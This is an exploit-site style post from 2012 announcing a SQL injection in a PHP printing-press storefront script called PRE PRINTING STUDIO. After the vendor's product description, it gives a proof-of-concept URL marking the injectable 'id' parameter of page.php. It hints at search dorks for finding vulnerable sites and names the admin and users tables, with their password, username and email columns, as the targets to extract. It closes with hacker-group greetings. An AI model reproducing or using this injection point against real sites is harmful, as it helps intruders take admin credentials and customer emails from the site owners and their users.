# Exploit Title: PRE PRINTING STUDIO Sql Injection
# Date: 16/03/2012
# Author: r45c4l
# Email: infosecpirate@gmail.com
# Script url: http://www.preprojects.com/preprojects/printing.asp
# Version: N/A
# CVE : ()
Product Description :
A complete printing press website script contains all features required for online printing business. Developed in PHP, MYSQL and Flash AS3, with all browsers compatibility and easy to navigate. Package contains builtin designers to customize designs online, shopping cart and complete users and orders modules.Product is user friedly and can fully operate via secure admin panel.Script is fully customizable and ready to upload to start your printing press now.
Product Cost : 999$
[ EXPL0!T ]
SQL Injection
p0c - http://SERVER/prestudio/page.php?id=[SQli]
d0rk - use your brain ;)
Some intresting tables and columns:
Table : admin Columns : password, username, id
Table : users columns : email, id
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0, Hoody, sam
All members of ICW, AH and G4H, and all Indian Hackers
Special Greetz to :b4ltazar and s1nn3r
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